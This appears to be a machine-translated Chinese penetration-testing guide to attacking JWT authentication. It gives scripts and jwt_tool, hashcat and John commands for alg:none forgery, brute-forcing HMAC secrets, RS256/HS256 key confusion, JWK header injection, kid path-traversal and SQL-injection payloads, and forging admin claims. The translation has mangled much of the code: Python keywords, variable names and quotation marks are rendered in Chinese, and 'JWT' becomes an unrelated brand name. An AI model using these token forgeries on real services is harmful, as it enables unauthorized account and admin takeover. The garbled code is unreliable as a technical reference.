# JWT 安全测试 ## 目的识别并利用 JSON Web Token (JWT) 实现中的漏洞，包括算法混淆攻击、密钥破解、签名绕过和声明操纵。 JWT 广泛用于身份验证和授权，使其成为安全测试的高价值目标。 ## 先决条件 ### 所需工具 * jwt_tool（Python JWT 操作） * Burp Suite 带有 JWT 扩展 * 用于破解的 Hashcat 或 John the Ripper * Python 与 PyJWT 库 * jwt.io 用于解码 ### 所需知识 * JWT 结构和声明 * 加密签名算法 * HTTP认证机制 * Base64编码 ## 输出和可交付成果 1. **JWT 漏洞评估** \- 发现实施中的弱点 2. **利用证明** \- 伪造代币演示绕过 3. **密钥恢复** \- 破解 HMAC 密钥 4. **补救指南** \- 安全实施建议 ## 核心工作流程 ### 第 1 阶段：了解 JWT 结构 JWT 由三个 Base64URL 编码部分组成：标头.有效负载.签名示例 JWT： eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6Ikpv aG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c **标题：** { “alg”：“HS256”， “类型”：“智威汤逊” } **有效负载（索赔）：** { “子”：“1234567890”， “姓名”：“约翰·多伊”， “iat”：1516239022， “经验”：1516242622， “管理员”：假 } **签名：** HMACSHA256( base64UrlEncode（标头）+“。” + base64UrlEncode(有效负载), 秘密）常见主张： * `iss` \- 发行者 * `sub` \- 主题 * `aud` \- 观众 * `exp` \- 过期时间 * `iat` \- 发布于 * `nbf` \- 不在之前 * `jti` \- JWT ID ### 第二阶段：智威汤逊侦察识别并解码 JWT： # 解码 JWT 部分回声“eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9”| Base64-d # 使用 jwt_tool jwt_tool <令牌> # 使用Python python3-c“ 导入base64 导入 json 代币 = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6Ikpv aG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c' parts = token.split('.') header = json.loads(base64.urlsafe_b64decode(parts[0] + '==')) 有效负载 = json.loads(base64.urlsafe_b64decode(parts[1] + '==')) print('标题:', json.dumps(标题, 缩进=2)) print('有效负载:', json.dumps(有效负载, 缩进=2)) ” # 在线解码器 # https://jwt.io 寻找： * 使用的算法（HS256、RS256等） * 敏感声明（管理员、角色、权限） * 过期设置 * 密钥 ID（孩子）标头 ### 第 3 阶段：无算法攻击利用接受未签名令牌的服务器： # 使用 jwt_tool jwt_tool <令牌> -X a # 手动利用 # 原始标题： {“alg”：“HS256”，“typ”：“JWT”} # 修改后的头部： {“alg”：“无”，“typ”：“JWT”} # 无算法的 Python 脚本 python3 << 'EOF' 导入base64 导入 json # 修改后的头部，没有算法 header = {“alg”：“无”，“typ”：“JWT”} 有效负载= {“子”：“1234567890”，“名称”：“管理员”，“管理员”：True，“iat”：1516239022} # 对头部和有效负载进行编码 header_b64 = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip('=') Payload_b64 = base64.urlsafe_b64encode(json.dumps(payload).encode()).decode().rstrip('=') # 创建没有签名的token 令牌= f“{header_b64}。{payload_b64}。” 打印（令牌） EOF 尝试的变化： {“alg”：“无”} {“alg”：“无”} {“alg”：“无”} {“alg”：“nOnE”} ### 第 4 阶段：密钥暴力破解破解较弱的 HMAC 秘密： # 将 jwt_tool 与字典一起使用 jwt_tool <令牌> -C -d /usr/share/wordlists/rockyou.txt # 使用哈希猫 # 首先，为 hashcat 格式化 token echo '<令牌>' > jwt.txt # JWT 的 Hashcat 模式 16500 hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt # 使用开膛手约翰约翰 jwt.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=HMAC-SHA256 # Python 暴力破解脚本 python3 << 'EOF' 导入jwt 导入系统代币 = “eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6Ikpv aG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c" with open('/usr/share/wordlists/rockyou.txt', 'r', error='ignore') as f: 对于 f 中的行：秘密 = line.strip() 尝试： jwt.decode(令牌、秘密、算法=['HS256']) print(f"[+] 发现秘密：{秘密}") 打破除外：通过 EOF 常见的弱秘密： *`秘密` * `密码` * `123456` * `jwt_秘密` * 公司名称或域名 ### 第五阶段：算法混淆攻击利用 RSA/HMAC 密钥混淆： # 如果服务器使用 RS256 但接受 HS256 # 使用公钥作为 HMAC 秘密进行签名 # 下载公钥卷曲 -s http://target.com/.well-known/jwks.json # 使用 jwt_tool jwt_tool <令牌> -X k -pk public.pem # Python 漏洞利用 python3 << 'EOF' 导入jwt 导入 json # 读取公钥将 open('public.pem', 'r') 作为 f：公钥 = f.read() # 创建具有提升权限的有效负载有效负载={ “子”：“管理员”， “管理员”：确实， “经验”：9999999999 } # 使用 HS256 进行签名，并以公钥作为秘密 token = jwt.encode(有效负载, public_key, 算法='HS256') 打印（令牌） EOF ### 第 6 阶段：JWK 标头注入在令牌中注入攻击者控制的密钥： # 使用jwt_tool进行JWK注入 jwt_tool <令牌> -X i # 创建嵌入 JWK 的令牌 python3 << 'EOF' 导入jwt 从 cryptography.hazmat.primitives 导入序列化从 cryptography.hazmat.primitives.asymmetry 导入 rsa 从 cryptography.hazmat.backends 导入 default_backend 导入 json 导入base64 # 生成RSA密钥对私有密钥 = rsa.generate_private_key( 公共指数=65537， key_size=2048, 后端=default_backend() ）公共密钥 = 私有密钥.公共密钥() # 提取JWK的公钥组件 public_numbers = public_key.public_numbers() n = base64.urlsafe_b64encode(public_numbers.n.to_bytes(256, '大')).decode().rstrip('=') e = base64.urlsafe_b64encode(public_numbers.e.to_bytes(3, '大')).decode().rstrip('=') # 创建嵌入 JWK 的标头标题={ “alg”：“RS256”， “类型”：“智威汤逊”， “jwk”：{ “kty”：“RSA”， “n”：n， “e”：e } } 有效负载= {“sub”：“admin”，“admin”：True} # 用我们的私钥签名 token = jwt.encode(payload, private_key, 算法='RS256', headers=header) 打印（令牌） EOF ### 第 7 阶段：KID（密钥 ID）注入利用密钥ID参数进行路径遍历或注入： # 通过kid进行路径遍历 # 标题： { “alg”：“HS256”， “类型”：“智威汤逊”， “孩子”：“../../../dev/null” } # 使用空字符串进行签名，因为 /dev/null 为空 # 通过kid进行SQL注入 { “alg”：“HS256”， “类型”：“智威汤逊”， "kid": "key1' UNION SELECT '秘密' --" } # 使用 jwt_tool 进行儿童剥削 jwt_tool <令牌> -X k -pk /dev/null # Python路径遍历攻击 python3 << 'EOF' 导入jwt 导入 json 导入base64 标题={ “alg”：“HS256”， “类型”：“智威汤逊”， “孩子”：“../../../dev/null” } 有效负载= {“sub”：“admin”，“admin”：True} # 使用空秘密进行签名（/dev/null 的内容）令牌= jwt.encode（有效负载，“”，算法='HS256'，标头=标头）打印（令牌） EOF ### 第 8 阶段：索赔操纵修改令牌声明以进行权限升级： # 使用jwt_tool来篡改声明 jwt_tool <令牌> -T # 修改具体声明 jwt_tool <令牌> -I -pc admin -pv true # 更改用户角色 jwt_tool <令牌> -I -pc 角色 -pv 管理员 # Python 声明操作（需要有效签名） python3 << 'EOF' 导入jwt # 无需验证即可解码令牌 =“eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...” Payload = jwt.decode(token, options={"verify_signature": False}) 打印（“原始：”，有效负载） # 修改声明有效负载['admin'] = True Payload['角色'] = '管理员' # 重新编码（需要有效的秘密） new_token = jwt.encode(payload, "known_secret", 算法='HS256') print("修改后的令牌：", new_token) EOF 声称目标： * `admin`, `isAdmin`, `is_admin` * `角色`、`角色`、`用户角色` * `权限`, `范围` * `user_id`, `uid`, `sub` * `电子邮件`, `用户名` ### 第 9 阶段：JWT 工具综合测试使用jwt_tool进行完整的漏洞扫描： # 安装 jwt_tool git 克隆 https://github.com/ticarpi/jwt_tool cd jwt_工具 pip install -r 要求.txt # 全面漏洞扫描 python3 jwt_tool.py <令牌> -M at # 具体攻击： # -X a : Alg:无攻击 # -X n : 空签名攻击 # -X b : 空白密码攻击 # -X s : 使用密钥文件签名 # -X k : 按键混淆攻击 # -X i : 注入 JWK # -X p : PKCS11 填充 oracle # 篡改模式 python3 jwt_tool.py <令牌> -T #破解秘密 python3 jwt_tool.py <令牌> -C -d wordlist.txt # 生成经过修改的新令牌 python3 jwt_tool.py <令牌> -I -pc admin -pv true -S hs256 -p“秘密” ### 第 10 阶段：Burp Suite JWT 测试配置 Burp 进行 JWT 测试： 1. 安装 JSON Web Tokens 扩展 - BApp Store > JSON Web 令牌 2. 使用JWT捕获请求 - JWT 出现在授权标头或 cookie 中 3. 消息编辑器中的 JWT 选项卡 - 解码并查看索赔 - 直接修改声明 - 用密钥重新签名 4.JWT扫描仪扩展 - 自动测试漏洞 - 无算法 - 算法混乱 - 弱键 5. 入侵者攻击 - 模糊声明值 - 测试算法变化 ## 快速参考 ### JWT 算法算法|类型 |描述 ---|---|--- HS256 |对称|具有 SHA-256 的 HMAC HS384 |对称|具有 SHA-384 的 HMAC HS512 |对称|具有 SHA-512 的 HMAC RS256 |不对称|具有 SHA-256 的 RSA RS384 |不对称 |具有 SHA-384 的 RSA RS512 |不对称|具有 SHA-512 的 RSA ES256 |不对称 |使用 SHA-256 的 ECDSA 无 |无 |无签名 ### 常见攻击总结攻击|漏洞|有效载荷 ---|---|--- 无算法 |接受未签名的令牌 | `“alg”：“无”` 秘密破解|弱 HMAC 秘密 |暴力破解关键困惑| RSA 密钥作为 HMAC 秘密 |使用公钥签名 JWK注射液|信任嵌入式密钥 |嵌入攻击者 JWK KID注射液|未经验证的孩子|路径遍历/SQLi ### jwt_tool 命令命令 |目的 ---|--- `jwt_tool <令牌>` |解码和分析 `jwt_tool <令牌> -T` |篡改模式 `jwt_tool <令牌> -C -d wordlist.txt` |破解秘密 `jwt_tool <令牌> -X a` |无算法攻击 `jwt_tool <令牌> -X k -pk key.pem` |按键混淆攻击 `jwt_tool <令牌> -M at` |所有测试模式 ## 约束和限制 ### 攻击限制 * 强大的秘密可以抵抗暴力 * 正确的算法验证可阻止混淆攻击 * 较短的过期时间限制了重播窗口 * 服务器端验证可能会发现篡改 ### 测试注意事项 * 测试前获得授权 * 有些攻击首先需要有效的令牌 * 速率限制可能会限制暴力尝试 * 生产代币的有效期可能较短 ### 安全实施检测 * 算法白名单执行 *强大的、轮换的秘密 * 正确的密钥分离（RSA/HMAC） * 在服务器上声明验证 ## 故障排除 ### 令牌修改后被拒绝 **解决方案：** 1. 验证签名算法是否匹配 2.检查过期未过 3.确保base64编码正确 4. 验证索赔格式期望 ### 秘密破解太慢 **解决方案：** 1.使用带有GPU加速的hashcat 2. 首先尝试目标词汇表 3. 手动检查公共秘密 4. 如果有的话，考虑使用彩虹表 ### 算法混乱不起作用 **解决方案：** 1. 验证服务器使用非对称算法 2.确保公钥格式正确 3.尝试不同的算法变体 4. 检查算法白名单

智威汤逊安全测试

包含技能